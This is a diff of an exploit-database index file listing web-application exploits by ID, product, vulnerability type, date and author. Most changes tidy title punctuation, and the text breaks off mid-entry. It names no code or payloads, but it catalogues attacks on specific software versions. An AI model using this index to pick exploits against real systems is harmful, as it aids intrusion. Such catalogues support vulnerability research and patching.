+14996,platforms/php/webapps/14996.txt,"Storyteller CMS - 'var' Local File Inclusion",2010-09-13,"BorN To K!LL",php,webapps,0 14997,platforms/php/webapps/14997.txt,"UCenter Home 2.0 - SQL Injection",2010-09-13,KnocKout,php,webapps,0 14998,platforms/php/webapps/14998.txt,"Joomla! Component JGen 0.9.33 - SQL Injection",2010-09-14,**RoAd_KiLlEr**,php,webapps,0 14999,platforms/asp/webapps/14999.txt,"freediscussionforums 1.0 - Multiple Vulnerabilities",2010-09-14,Abysssec,asp,webapps,0 @@ -24757,7 +24758,7 @@ id,file,description,date,author,platform,type,port 15143,platforms/php/webapps/15143.txt,"e107 0.7.23 - SQL Injection",2010-09-28,"High-Tech Bridge SA",php,webapps,0 15139,platforms/asp/webapps/15139.txt,"AtomatiCMS - Upload Arbitrary File",2010-09-28,Abysssec,asp,webapps,0 15141,platforms/php/webapps/15141.txt,"JE CMS 1.0.0 - Authentication Bypass",2010-09-28,Abysssec,php,webapps,0 -15144,platforms/windows/webapps/15144.txt,"Aleza Portal 1.6 - Insecure (SQL Injection) Cookie Handling",2010-09-28,KnocKout,windows,webapps,0 +15144,platforms/windows/webapps/15144.txt,"Aleza Portal 1.6 - Insecure SQL Injection / Cookie Handling",2010-09-28,KnocKout,windows,webapps,0 15145,platforms/php/webapps/15145.txt,"Achievo 1.4.3 - Multiple Authorisation Vulnerabilities",2010-09-28,"Pablo Milano",php,webapps,0 15146,platforms/php/webapps/15146.txt,"Achievo 1.4.3 - Cross-Site Request Forgery",2010-09-28,"Pablo Milano",php,webapps,0 15147,platforms/php/webapps/15147.txt,"Micro CMS 1.0 b1 - Persistent Cross-Site Scripting",2010-09-28,"SecPod Research",php,webapps,0 @@ -24918,14 +24919,14 @@ id,file,description,date,author,platform,type,port 15490,platforms/php/webapps/15490.txt,"XT:Commerce < 3.04 SP2.1 - Cross-Site Scripting",2010-11-11,"Philipp Niedziela",php,webapps,0 15486,platforms/php/webapps/15486.txt,"eBlog 1.7 - Multiple SQL Injections",2010-11-10,"Salvatore Fresta",php,webapps,0 15488,platforms/php/webapps/15488.txt,"Landesk - OS command Injection",2010-11-11,"Aureliano Calvo",php,webapps,0 -15492,platforms/php/webapps/15492.php,"E-Xoopport 3.1 - eCal display.php (katid) SQL Injection",2010-11-11,"Vis Intelligendi",php,webapps,0 +15492,platforms/php/webapps/15492.php,"E-Xoopport 3.1 - 'display.php?katid' SQL Injection",2010-11-11,"Vis Intelligendi",php,webapps,0 15497,platforms/asp/webapps/15497.txt,"ASPilot Pilot Cart 7.3 - 'newsroom.asp' SQL Injection",2010-11-12,Daikin,asp,webapps,0 15500,platforms/php/webapps/15500.txt,"Woltlab Burning Board 2.3.4 - File Disclosure",2010-11-12,sfx,php,webapps,0 15501,platforms/php/webapps/15501.txt,"Joomla! Component JSupport 1.5.6 - Cross-Site Scripting",2010-11-12,Valentin,php,webapps,0 15502,platforms/php/webapps/15502.txt,"Joomla! Component JSupport 1.5.6 - SQL Injection",2010-11-12,Valentin,php,webapps,0 15506,platforms/hardware/webapps/15506.txt,"Camtron CMNC-200 IP Camera - Authentication Bypass",2010-11-13,"Trustwave's SpiderLabs",hardware,webapps,0 15507,platforms/hardware/webapps/15507.txt,"Camtron CMNC-200 IP Camera - Undocumented Default Accounts",2010-11-13,"Trustwave's SpiderLabs",hardware,webapps,0 -15509,platforms/php/webapps/15509.txt,"Build a Niche Store 3.0 - (BANS) Authentication Bypass",2010-11-13,"ThunDEr HeaD",php,webapps,0 +15509,platforms/php/webapps/15509.txt,"Build a Niche Store 3.0 - 'BANS' Authentication Bypass",2010-11-13,"ThunDEr HeaD",php,webapps,0 15510,platforms/php/webapps/15510.txt,"AWCM 2.1 final - Remote File Inclusion",2010-11-13,LoSt.HaCkEr,php,webapps,0 15512,platforms/php/webapps/15512.py,"DBSite - SQL Injection",2010-11-13,God_Of_Pain,php,webapps,0 15513,platforms/php/webapps/15513.txt,"WordPress Plugin Event Registration 5.32 - SQL Injection",2010-11-13,k3m4n9i,php,webapps,0 @@ -24975,7 +24976,7 @@ id,file,description,date,author,platform,type,port 15623,platforms/php/webapps/15623.pl,"MemHT Portal 4.0.1 - user agent Persistent Cross-Site Scripting",2010-11-27,ZonTa,php,webapps,0 15625,platforms/cgi/webapps/15625.txt,"Skeletonz CMS - Persistent Cross-Site Scripting",2010-11-28,Jbyte,cgi,webapps,0 15627,platforms/asp/webapps/15627.html,"Site2Nite Big Truck Broker - 'txtSiteId' SQL Injection",2010-11-28,underground-stockholm.com,asp,webapps,0 -15629,platforms/asp/webapps/15629.txt,"MicroNetSoft RV Dealer Website - search.asp / showAlllistings.asp SQL Injection",2010-11-29,underground-stockholm.com,asp,webapps,0 +15629,platforms/asp/webapps/15629.txt,"MicroNetSoft RV Dealer Website - 'search.asp' / showAlllistings.asp' SQL Injection",2010-11-29,underground-stockholm.com,asp,webapps,0 15633,platforms/php/webapps/15633.html,"Diferior 8.03 - Multiple Cross-Site Scripting Vulnerabilities",2010-11-29,"High-Tech Bridge SA",php,webapps,0 15636,platforms/php/webapps/15636.txt,"Orbis CMS 1.0.2 - Arbitrary File Upload",2010-11-30,"Mark Stanislav",php,webapps,0 15637,platforms/php/webapps/15637.txt,"Link Protect 1.2 - Persistent Cross-Site Scripting",2010-11-30,"Shichemt Alen",php,webapps,0 @@ -25009,7 +25010,7 @@ id,file,description,date,author,platform,type,port 15682,platforms/asp/webapps/15682.txt,"ASPSiteWare ASP Gallery 1.0 - SQL Injection",2010-12-04,R4dc0re,asp,webapps,0 15683,platforms/asp/webapps/15683.txt,"ASPSiteWare Contact Directory 1.0 - SQL Injection",2010-12-04,R4dc0re,asp,webapps,0 15684,platforms/php/webapps/15684.txt,"WordPress 3.0.1 - 'do_trackbacks()' SQL Injection",2010-12-05,M4g,php,webapps,0 -15685,platforms/php/webapps/15685.html,"PHPKF Forum 1.80 - profil_degistir.php Cross-Site Request Forgery",2010-12-05,FreWaL,php,webapps,0 +15685,platforms/php/webapps/15685.html,"PHPKF Forum 1.80 - 'profil_degistir.php' Cross-Site Request Forgery",2010-12-05,FreWaL,php,webapps,0 15686,platforms/asp/webapps/15686.txt,"Gatesoft Docusafe 4.1.0 - SQL Injection",2010-12-05,R4dc0re,asp,webapps,0 15687,platforms/asp/webapps/15687.txt,"Ecommercemax Solutions Digital Goods Seller - SQL Injection",2010-12-05,R4dc0re,asp,webapps,0 15688,platforms/asp/webapps/15688.txt,"HotWebScripts HotWeb Rentals - 'resorts.asp' SQL Injection",2010-12-05,R4dc0re,asp,webapps,0 @@ -25151,7 +25152,7 @@ id,file,description,date,author,platform,type,port 15995,platforms/php/webapps/15995.txt,"glfusion CMS 1.2.1 - 'img' Persistent Cross-Site Scripting",2011-01-15,Saif,php,webapps,0 15996,platforms/php/webapps/15996.txt,"CompactCMS 1.4.1 - Multiple Vulnerabilities",2011-01-15,"Patrick de Brouwer",php,webapps,0 15997,platforms/jsp/webapps/15997.py,"MeshCMS 3.5 - Remote Code Execution",2011-01-16,mr_me,jsp,webapps,0 -15999,platforms/php/webapps/15999.txt,"BetMore Site Suite 4 - (bid) Blind SQL Injection",2011-01-16,"BorN To K!LL",php,webapps,0 +15999,platforms/php/webapps/15999.txt,"BetMore Site Suite 4 - 'bid' Blind SQL Injection",2011-01-16,"BorN To K!LL",php,webapps,0 16000,platforms/php/webapps/16000.txt,"Seo Panel 2.2.0 - Cookie-Rendered Persistent Cross-Site Scripting",2011-01-16,"Mark Stanislav",php,webapps,0 16001,platforms/php/webapps/16001.txt,"Joomla! Component com_people 1.0.0 - Local File Inclusion",2011-01-16,ALTBTA,php,webapps,0 16003,platforms/php/webapps/16003.txt,"AWBS 2.9.2 - 'cart.php' Blind SQL Injection",2011-01-16,ShivX,php,webapps,0 @@ -25179,9 +25180,9 @@ id,file,description,date,author,platform,type,port 16054,platforms/windows/webapps/16054.txt,"sap crystal report server 2008 - Directory Traversal",2011-01-26,"Dmitriy Chastuhin",windows,webapps,0 16058,platforms/php/webapps/16058.txt,"MultiPowUpload 2.1 - Arbitrary File Upload",2011-01-26,DIES3L,php,webapps,0 16059,platforms/php/webapps/16059.txt,"Xnova Legacies 2009.2 - Cross-Site Request Forgery",2011-01-26,"Xploit A Day",php,webapps,0 -16061,platforms/php/webapps/16061.txt,"PHP Link Directory Software - (sbcat_id) SQL Injection",2011-01-28,"BorN To K!LL",php,webapps,0 +16061,platforms/php/webapps/16061.txt,"PHP Link Directory Software - 'sbcat_id' SQL Injection",2011-01-28,"BorN To K!LL",php,webapps,0 16062,platforms/php/webapps/16062.txt,"PHP Classified ads software - 'cid' Blind SQL Injection",2011-01-28,"BorN To K!LL",php,webapps,0 -16069,platforms/php/webapps/16069.txt,"PHP Script Directory Software - (sbcat_id) SQL Injection",2011-01-28,"BorN To K!LL",php,webapps,0 +16069,platforms/php/webapps/16069.txt,"PHP Script Directory Software - 'sbcat_id' SQL Injection",2011-01-28,"BorN To K!LL",php,webapps,0 16074,platforms/php/webapps/16074.txt,"MultiCMS - Local File Inclusion",2011-01-29,R3VAN_BASTARD,php,webapps,0 16076,platforms/php/webapps/16076.txt,"vBSEO 3.2.2/3.5.2 - Persistent Cross-Site Scripting via LinkBacks",2011-01-30,MaXe,php,webapps,0 16077,platforms/php/webapps/16077.txt,"vBSEO Sitemap 2.5/3.0 - Multiple Vulnerabilities",2011-01-30,MaXe,php,webapps,0 @@ -25215,7 +25216,7 @@ id,file,description,date,author,platform,type,port 16168,platforms/php/webapps/16168.txt,"RunCMS 2.2.2 - Multiple Vulnerabilities",2011-02-14,"High-Tech Bridge SA",php,webapps,0 16143,platforms/php/webapps/16143.txt,"MihanTools Script 1.3.3 - SQL Injection",2011-02-09,WHITE_DEVIL,php,webapps,0 16144,platforms/php/webapps/16144.txt,"WordPress Plugin Enable Media Replace - Multiple Vulnerabilities",2011-02-09,"Ulf Harnhammar",php,webapps,0 -16183,platforms/php/webapps/16183.txt,"GAzie 5.10 - Login Parameter Multiple Vulnerabilities",2011-02-17,LiquidWorm,php,webapps,0 +16183,platforms/php/webapps/16183.txt,"GAzie 5.10 - 'Login' Multiple Vulnerabilities",2011-02-17,LiquidWorm,php,webapps,0 16165,platforms/php/webapps/16165.txt,"AWCM 2.2 Final - Persistent Cross-Site Scripting",2011-02-14,_84kur10_,php,webapps,0 16148,platforms/php/webapps/16148.txt,"SourceBans 1.4.7 - Cross-Site Scripting",2011-02-09,Sw1tCh,php,webapps,0 16152,platforms/multiple/webapps/16152.py,"LocatePC 1.05 (Ligatt Version + Others) - SQL Injection",2011-02-10,anonymous,multiple,webapps,0 @@ -25225,7 +25226,7 @@ id,file,description,date,author,platform,type,port 16157,platforms/jsp/webapps/16157.py,"Openedit 5.1294 - Remote Code Execution",2011-02-11,mr_me,jsp,webapps,0 16158,platforms/php/webapps/16158.txt,"TaskFreak! 0.6.4 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-12,LiquidWorm,php,webapps,0 16159,platforms/php/webapps/16159.txt,"Escort Agency CMS - Blind SQL Injection",2011-02-12,NoNameMT,php,webapps,0 -16160,platforms/php/webapps/16160.txt,"PixelPost 1.7.3 - Multiple POST Parameter SQL Injections",2011-02-12,LiquidWorm,php,webapps,0 +16160,platforms/php/webapps/16160.txt,"PixelPost 1.7.3 - Multiple POST SQL Injections",2011-02-12,LiquidWorm,php,webapps,0 16170,platforms/php/webapps/16170.txt,"phpMyBitTorrent 2.0.4 - SQL Injection",2011-02-15,#forkbombers,php,webapps,0 16171,platforms/cfm/webapps/16171.py,"Lingxia I.C.E CMS - Blind SQL Injection",2011-02-15,mr_me,cfm,webapps,0 16172,platforms/php/webapps/16172.txt,"omegabill 1.0 build 6 - Multiple Vulnerabilities",2011-02-15,"AutoSec Tools",php,webapps,0 @@ -25275,7 +25276,7 @@ id,file,description,date,author,platform,type,port 16280,platforms/php/webapps/16280.py,"vTiger CRM 5.0.4 - Unauthenticated Local File Inclusion",2011-03-05,TecR0c,php,webapps,0 16281,platforms/php/webapps/16281.txt,"BoutikOne - 'description.php' SQL Injection",2011-03-05,IRAQ_JAGUAR,php,webapps,0 41784,platforms/php/webapps/41784.txt,"Pixie 1.0.4 - Arbitrary File Upload",2017-04-02,rungga_reksya,php,webapps,0 -16313,platforms/php/webapps/16313.rb,"FreeNAS - exec_raw.php Arbitrary Command Execution (Metasploit)",2010-11-24,Metasploit,php,webapps,0 +16313,platforms/php/webapps/16313.rb,"FreeNAS - 'exec_raw.php' Arbitrary Command Execution (Metasploit)",2010-11-24,Metasploit,php,webapps,0 41801,platforms/multiple/webapps/41801.html,"Apple Webkit - Universal Cross-Site Scripting by Accessing a Named Property from an Unloaded Window",2017-04-04,"Google Security Research",multiple,webapps,0 41802,platforms/multiple/webapps/41802.html,"Apple WebKit 10.0.2 (12602.3.12.0.1) - 'disconnectSubframes' Universal Cross-Site Scripting",2017-04-04,"Google Security Research",multiple,webapps,0 41803,platforms/multiple/webapps/41803.html,"Apple WebKit 10.0.2 (12602.3.12.0.1_ r210800) - 'constructJSReadableStreamDefaultReader' Type Confusion",2017-04-04,"Google Security Research",multiple,webapps,0 @@ -25284,17 +25285,17 @@ id,file,description,date,author,platform,type,port 16788,platforms/cfm/webapps/16788.rb,"ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit)",2010-11-24,Metasploit,cfm,webapps,0 16856,platforms/cgi/webapps/16856.rb,"DD-WRT HTTPd Daemon/Service - Arbitrary Command Execution (Metasploit)",2010-07-07,Metasploit,cgi,webapps,0 16857,platforms/cgi/webapps/16857.rb,"Alcatel-Lucent OmniPCX Enterprise - masterCGI Arbitrary Command Execution (Metasploit)",2010-10-05,Metasploit,cgi,webapps,0 -16858,platforms/php/webapps/16858.rb,"RedHat Piranha Virtual Server Package - passwd.php3 Arbitrary Command Execution (Metasploit)",2010-10-18,Metasploit,php,webapps,0 +16858,platforms/php/webapps/16858.rb,"RedHat Piranha Virtual Server Package - 'passwd.php3' Arbitrary Command Execution (Metasploit)",2010-10-18,Metasploit,php,webapps,0 41782,platforms/hardware/webapps/41782.txt,"Zyxel_ EMG2926 < V1.00(AAQT.4)b8 - OS Command Injection",2017-04-02,"trevor Hough",hardware,webapps,0 -16881,platforms/php/webapps/16881.rb,"Cacti - graph_view.php Remote Command Execution (Metasploit)",2010-07-03,Metasploit,php,webapps,0 +16881,platforms/php/webapps/16881.rb,"Cacti - 'graph_view.php' Remote Command Execution (Metasploit)",2010-07-03,Metasploit,php,webapps,0 16882,platforms/php/webapps/16882.rb,"XML-RPC Library 1.3.0 - 'xmlrpc.php' Arbitrary Code Execution (Metasploit)",2010-07-25,Metasploit,php,webapps,0 16883,platforms/php/webapps/16883.rb,"Simple PHP Blog 0.4.0 - Remote Command Execution (Metasploit)",2010-07-25,Metasploit,php,webapps,0 16885,platforms/php/webapps/16885.rb,"TikiWiki jhot - Remote Command Execution (Metasploit)",2010-07-25,Metasploit,php,webapps,0 16886,platforms/cgi/webapps/16886.rb,"AWStats 6.4 < 6.5 - migrate Remote Command Execution (Metasploit)",2010-07-03,Metasploit,cgi,webapps,0 16889,platforms/linux/webapps/16889.rb,"Redmine SCM Repository 0.9.x/1.0.x - Arbitrary Command Execution (Metasploit)",2011-01-08,Metasploit,linux,webapps,0 -16890,platforms/php/webapps/16890.rb,"phpBB - viewtopic.php Arbitrary Code Execution (Metasploit)",2010-07-03,Metasploit,php,webapps,0 +16890,platforms/php/webapps/16890.rb,"phpBB - 'viewtopic.php' Arbitrary Code Execution (Metasploit)",2010-07-03,Metasploit,php,webapps,0 16891,platforms/cgi/webapps/16891.rb,"QuickTime Streaming Server - parse_xml.cgi Remote Execution (Metasploit)",2010-07-03,Metasploit,cgi,webapps,0 -16892,platforms/php/webapps/16892.rb,"TWiki History TWikiUsers - rev Parameter Command Execution (Metasploit)",2010-07-03,Metasploit,php,webapps,0 +16892,platforms/php/webapps/16892.rb,"TWiki History TWikiUsers - 'rev' Command Execution (Metasploit)",2010-07-03,Metasploit,php,webapps,0 16893,platforms/cgi/webapps/16893.rb,"Barracuda - IMG.pl Remote Command Execution (Metasploit)",2010-04-30,Metasploit,cgi,webapps,0 16894,platforms/php/webapps/16894.rb,"TWiki - Search Function Arbitrary Command Execution (Metasploit)",2010-07-03,Metasploit,php,webapps,0 16895,platforms/php/webapps/16895.rb,"WordPress 1.5.1.3 - 'cache_lastpostdate' Arbitrary Code Execution (Metasploit)",2010-07-03,Metasploit,php,webapps,0 @@ -25308,12 +25309,12 @@ id,file,description,date,author,platform,type,port 16906,platforms/php/webapps/16906.rb,"Joomla! Plugin tinybrowser 1.5.12 - Arbitrary File Upload / Code Execution (Metasploit)",2010-06-15,Metasploit,php,webapps,0 16907,platforms/hardware/webapps/16907.rb,"Google Appliance ProxyStyleSheet - Command Execution (Metasploit)",2010-07-01,Metasploit,hardware,webapps,0 16908,platforms/cgi/webapps/16908.rb,"Nagios3 - statuswml.cgi Ping Command Execution (Metasploit)",2010-07-14,Metasploit,cgi,webapps,0 -16909,platforms/php/webapps/16909.rb,"Coppermine Photo Gallery 1.4.14 - picEditor.php Command Execution (Metasploit)",2010-07-03,Metasploit,php,webapps,0 +16909,platforms/php/webapps/16909.rb,"Coppermine Photo Gallery 1.4.14 - 'picEditor.php' Command Execution (Metasploit)",2010-07-03,Metasploit,php,webapps,0 16911,platforms/php/webapps/16911.rb,"TikiWiki tiki-graph_formula - PHP Remote Code Execution (Metasploit)",2010-09-20,Metasploit,php,webapps,0 16912,platforms/php/webapps/16912.rb,"Mambo - Cache_Lite Class MosConfig_absolute_path Remote File Inclusion (Metasploit)",2010-11-24,Metasploit,php,webapps,0 16913,platforms/php/webapps/16913.rb,"phpMyAdmin - Config File Code Injection (Metasploit)",2010-07-03,Metasploit,php,webapps,0 16914,platforms/cgi/webapps/16914.rb,"The Matt Wright Guestbook.pl - Arbitrary Command Execution (Metasploit)",2010-07-03,Metasploit,cgi,webapps,0 -16917,platforms/php/webapps/16917.rb,"Dogfood CRM - spell.php Remote Command Execution (Metasploit)",2010-07-03,Metasploit,php,webapps,0 +16917,platforms/php/webapps/16917.rb,"Dogfood CRM - 'spell.php' Remote Command Execution (Metasploit)",2010-07-03,Metasploit,php,webapps,0 16923,platforms/hardware/webapps/16923.rb,"ContentKeeper Web - Remote Command Execution (Metasploit)",2010-10-09,Metasploit,hardware,webapps,0 16931,platforms/php/webapps/16931.html,"N-13 News 4.0 - Cross-Site Request Forgery (Add Admin)",2011-03-06,AtT4CKxT3rR0r1ST,php,webapps,0 16946,platforms/php/webapps/16946.txt,"Ruubikcms 1.0.3 - Multiple Vulnerabilities",2011-03-08,"Khashayar Fereidani",php,webapps,0 @@ -25345,7 +25346,7 @@ id,file,description,date,author,platform,type,port 16992,platforms/php/webapps/16992.txt,"Joomla! 1.6 - Multiple SQL Injections",2011-03-17,"Aung Khant",php,webapps,0 16995,platforms/php/webapps/16995.txt,"Joomla! Component com_booklibrary - SQL Injection",2011-03-17,"Marc Doudiet",php,webapps,0 16997,platforms/php/webapps/16997.txt,"Tugux CMS 1.0_final - Multiple Vulnerabilities",2011-03-17,Aodrulez,php,webapps,0 -17000,platforms/php/webapps/17000.txt,"Tugux CMS - (nid) Blind SQL Injection",2011-03-18,eidelweiss,php,webapps,0 +17000,platforms/php/webapps/17000.txt,"Tugux CMS - 'nid' Blind SQL Injection",2011-03-18,eidelweiss,php,webapps,0 17002,platforms/php/webapps/17002.txt,"CMS Loko Media - Local File Download",2011-03-18,Xr0b0t,php,webapps,0 17003,platforms/php/webapps/17003.py,"iCMS 1.1 - Admin SQL Injection / Brute Force Exploit",2011-03-18,TecR0c,php,webapps,0 17005,platforms/php/webapps/17005.txt,"Kleophatra 0.1.4 - Arbitrary File Upload",2011-03-19,Xr0b0t,php,webapps,0 @@ -25386,7 +25387,7 @@ id,file,description,date,author,platform,type,port 17123,platforms/php/webapps/17123.txt,"Tutorialms 1.4 (show) - SQL Injection",2011-04-05,LiquidWorm,php,webapps,0 17098,platforms/php/webapps/17098.txt,"InTerra Blog Machine 1.84 - Cross-Site Scripting",2011-04-01,"High-Tech Bridge SA",php,webapps,0 17099,platforms/php/webapps/17099.txt,"Feng Office 1.7.3.3 - Cross-Site Request Forgery",2011-04-01,"High-Tech Bridge SA",php,webapps,0 -17100,platforms/php/webapps/17100.txt,"spidaNews 1.0 - 'news.php id' SQL Injection",2011-04-02,"Easy Laster",php,webapps,0 +17100,platforms/php/webapps/17100.txt,"spidaNews 1.0 - 'news.php?id' SQL Injection",2011-04-02,"Easy Laster",php,webapps,0 17101,platforms/php/webapps/17101.txt,"ilchClan 1.0.5 - 'regist.php' SQL Injection",2011-04-02,"Easy Laster",php,webapps,0 17102,platforms/php/webapps/17102.txt,"Anzeigenmarkt 2011 - 'index.php' SQL Injection",2011-04-02,"Easy Laster",php,webapps,0 17103,platforms/php/webapps/17103.txt,"Advanced Image Hosting 2.2 - 'index.php' SQL Injection",2011-04-03,keracker,php,webapps,0 @@ -25507,8 +25508,8 @@ id,file,description,date,author,platform,type,port 17375,platforms/asp/webapps/17375.txt,"EquiPCS - SQL Injection",2011-06-09,Sideswipe,asp,webapps,0 17376,platforms/hardware/webapps/17376.txt,"Aastra IP Phone 9480i - Web Interface Data Disclosure",2011-06-09,"Yakir Wizman",hardware,webapps,0 17377,platforms/hardware/webapps/17377.txt,"Polycom IP Phone - Web Interface Data Disclosure",2011-06-09,"Yakir Wizman",hardware,webapps,0 -17378,platforms/php/webapps/17378.py,"Pacer Edition CMS 2.1 - (rm) Arbitrary File Deletion",2011-06-10,LiquidWorm,php,webapps,0 -17379,platforms/php/webapps/17379.txt,"Pacer Edition CMS 2.1 - (l Parameter) Local File Inclusion",2011-06-10,LiquidWorm,php,webapps,0 +17378,platforms/php/webapps/17378.py,"Pacer Edition CMS 2.1 - 'rm' Arbitrary File Deletion",2011-06-10,LiquidWorm,php,webapps,0 +17379,platforms/php/webapps/17379.txt,"Pacer Edition CMS 2.1 - 'l' Local File Inclusion",2011-06-10,LiquidWorm,php,webapps,0 17380,platforms/php/webapps/17380.txt,"Angora Guestbook 1.5 - Local File Inclusion",2011-06-10,"AutoSec Tools",php,webapps,0 17382,platforms/windows/webapps/17382.txt,"Tele Data Contact Management Server - Directory Traversal",2011-06-10,"AutoSec Tools",windows,webapps,0 17388,platforms/windows/webapps/17388.txt,"Trend Micro Data Loss Prevention Virtual Appliance 5.5 - Directory Traversal",2011-06-11,"White Hat Consultores",windows,webapps,0 @@ -25591,10 +25592,10 @@ id,file,description,date,author,platform,type,port 17573,platforms/php/webapps/17573.txt,"PHP-Barcode 0.3pl1 - Remote Code Execution",2011-07-26,beford,php,webapps,0 17577,platforms/cgi/webapps/17577.txt,"SWAT Samba Web Administration Tool - Cross-Site Request Forgery (PoC)",2011-07-27,"Narendra Shinde",cgi,webapps,0 17579,platforms/php/webapps/17579.rb,"Joomla! Component com_virtuemart 1.1.7/1.5 - Blind Time-Based SQL Injection (Metasploit)",2011-07-28,TecR0c,php,webapps,0 -17584,platforms/php/webapps/17584.php,"cFTP 0.1 - (r80) Arbitrary File Upload",2011-07-29,leviathan,php,webapps,0 +17584,platforms/php/webapps/17584.php,"cFTP 0.1 - 'r80' Arbitrary File Upload",2011-07-29,leviathan,php,webapps,0 17586,platforms/jsp/webapps/17586.txt,"ManageEngine ServiceDesk Plus 8.0 Build 8013 - Multiple Cross-Site Scripting Vulnerabilities",2011-07-29,"Narendra Shinde",jsp,webapps,0 17587,platforms/php/webapps/17587.txt,"Link Station Pro - Multiple Vulnerabilities",2011-07-30,"$#4d0\/\/[r007k17]",php,webapps,0 -17590,platforms/php/webapps/17590.txt,"Digital Scribe 1.5 - (register_form()) Multiple POST Cross-Site Scripting Vulnerabilities",2011-07-31,LiquidWorm,php,webapps,0 +17590,platforms/php/webapps/17590.txt,"Digital Scribe 1.5 - register_form()' Multiple POST Cross-Site Scripting Vulnerabilities",2011-07-31,LiquidWorm,php,webapps,0 17591,platforms/php/webapps/17591.txt,"Joomla! Component obSuggest - Local File Inclusion",2011-07-31,v3n0m,php,webapps,0 17592,platforms/php/webapps/17592.txt,"CMSPro! 2.08 - Cross-Site Request Forgery",2011-08-01,Xadpritox,php,webapps,0 17593,platforms/php/webapps/17593.txt,"ZoneMinder 1.24.3 - Remote File Inclusion",2011-08-01,iye,php,webapps,0 @@ -25726,9 +25727,9 @@ id,file,description,date,author,platform,type,port 17832,platforms/php/webapps/17832.txt,"WordPress Plugin E-Commerce 3.8.6 - SQL Injection",2011-09-14,"Miroslav Stampar",php,webapps,0 17840,platforms/windows/webapps/17840.txt,"Cogent DataHub 7.1.1.63 - Source Disclosure",2011-09-14,"Luigi Auriemma",windows,webapps,0 17846,platforms/jsp/webapps/17846.php,"Nortel Contact Recording Centralized Archive 6.5.1 - SQL Injection",2011-09-15,rgod,jsp,webapps,0 -17850,platforms/php/webapps/17850.txt,"iBrowser Plugin 1.4.1 - (lang) Local File Inclusion",2011-09-17,LiquidWorm,php,webapps,0 -17851,platforms/php/webapps/17851.txt,"iManager Plugin 1.2.8 - (lang) Local File Inclusion",2011-09-17,LiquidWorm,php,webapps,0 -17852,platforms/php/webapps/17852.txt,"iManager Plugin 1.2.8 - (d) Arbitrary File Deletion",2011-09-17,LiquidWorm,php,webapps,0 +17850,platforms/php/webapps/17850.txt,"iBrowser Plugin 1.4.1 - 'lang' Local File Inclusion",2011-09-17,LiquidWorm,php,webapps,0 +17851,platforms/php/webapps/17851.txt,"iManager Plugin 1.2.8 - 'lang' Local File Inclusion",2011-09-17,LiquidWorm,php,webapps,0 +17852,platforms/php/webapps/17852.txt,"iManager Plugin 1.2.8 - 'd' Arbitrary File Deletion",2011-09-17,LiquidWorm,php,webapps,0 17858,platforms/php/webapps/17858.txt,"WordPress Plugin Filedownload 0.1 - 'download.php' Remote File Disclosure",2011-09-19,Septemb0x,php,webapps,0 17859,platforms/php/webapps/17859.txt,"Toko Lite CMS 1.5.2 - 'edit.php' HTTP Response Splitting",2011-09-19,LiquidWorm,php,webapps,0 17857,platforms/php/webapps/17857.txt,"WordPress Plugin Count per Day 2.17 - SQL Injection",2011-09-18,"Miroslav Stampar",php,webapps,0 @@ -25796,7 +25797,7 @@ id,file,description,date,author,platform,type,port 17987,platforms/php/webapps/17987.txt,"WordPress Plugin BackWPUp 2.1.4 - Code Execution",2011-10-17,"Sense of Security",php,webapps,0 17994,platforms/php/webapps/17994.php,"Dolphin 7.0.7 - 'member_menu_queries.php' Remote PHP Code Injection",2011-10-18,EgiX,php,webapps,0 17989,platforms/php/webapps/17989.txt,"Dominant Creature BBG/RPG Browser Game - Persistent Cross-Site Scripting",2011-10-17,M.Jock3R,php,webapps,0 -17992,platforms/php/webapps/17992.txt,"GNUBoard 4.33.02 - 'tp.php PATH_INFO' SQL Injection",2011-10-17,flyh4t,php,webapps,0 +17992,platforms/php/webapps/17992.txt,"GNUBoard 4.33.02 - 'tp.php?PATH_INFO' SQL Injection",2011-10-17,flyh4t,php,webapps,0 17995,platforms/php/webapps/17995.txt,"Joomla! Plugin NoNumber Framework - Multiple Vulnerabilities",2011-10-18,jdc,php,webapps,0 17997,platforms/php/webapps/17997.txt,"Yet Another CMS 1.0 - SQL Injection / Cross-Site Scripting",2011-10-19,"Stefan Schurtz",php,webapps,0 17998,platforms/php/webapps/17998.txt,"Openemr-4.1.0 - SQL Injection",2011-10-19,"I2sec-dae jin Oh",php,webapps,0 @@ -25832,7 +25833,7 @@ id,file,description,date,author,platform,type,port 18058,platforms/php/webapps/18058.txt,"Joomla! Component Alameda 1.0 - SQL Injection",2011-10-31,kaMtiEz,php,webapps,0 18061,platforms/hardware/webapps/18061.txt,"ZTE ZXDSL 831IIV7.5.0a_Z29_OV - Multiple Vulnerabilities",2011-11-01,"mehdi boukazoula",hardware,webapps,0 18063,platforms/php/webapps/18063.txt,"BST (BestShopPro) - 'nowosci.php' Multiple Vulnerabilities",2011-11-02,CoBRa_21,php,webapps,0 -18065,platforms/php/webapps/18065.txt,"SetSeed CMS 5.8.20 - (loggedInUser) SQL Injection",2011-11-02,LiquidWorm,php,webapps,0 +18065,platforms/php/webapps/18065.txt,"SetSeed CMS 5.8.20 - 'loggedInUser' SQL Injection",2011-11-02,LiquidWorm,php,webapps,0 18066,platforms/php/webapps/18066.txt,"CaupoShop Pro (2.x < 3.70) Classic 3.01 - Local File Inclusion",2011-11-02,"Rami Salama",php,webapps,0 18069,platforms/php/webapps/18069.txt,"Jara 1.6 - Multiple Vulnerabilities",2011-11-03,Or4nG.M4N,php,webapps,0 18070,platforms/php/webapps/18070.txt,"Web File Browser 0.4b14 - File Download",2011-11-03,"Sangyun YOO",php,webapps,0 @@ -25865,7 +25866,7 @@ id,file,description,date,author,platform,type,port 18128,platforms/php/webapps/18128.txt,"Valid tiny-erp 1.6 - SQL Injection",2011-11-19,muuratsalo,php,webapps,0 18129,platforms/php/webapps/18129.txt,"Blogs manager 1.101 - SQL Injection",2011-11-19,muuratsalo,php,webapps,0 18131,platforms/php/webapps/18131.txt,"ARASTAR - SQL Injection",2011-11-19,TH3_N3RD,php,webapps,0 -18148,platforms/php/webapps/18148.pl,"PHP-Nuke 8.1.0.3.5b - (Downloads) Blind SQL Injection",2011-11-23,Dante90,php,webapps,0 +18148,platforms/php/webapps/18148.pl,"PHP-Nuke 8.1.0.3.5b - 'Downloads' Blind SQL Injection",2011-11-23,Dante90,php,webapps,0 18149,platforms/php/webapps/18149.php,"PmWiki 2.2.34 - 'pagelist' Remote PHP Code Injection (1)",2011-11-23,EgiX,php,webapps,0 18151,platforms/php/webapps/18151.php,"Log1 CMS 2.0 - 'ajax_create_folder.php' Remote Code 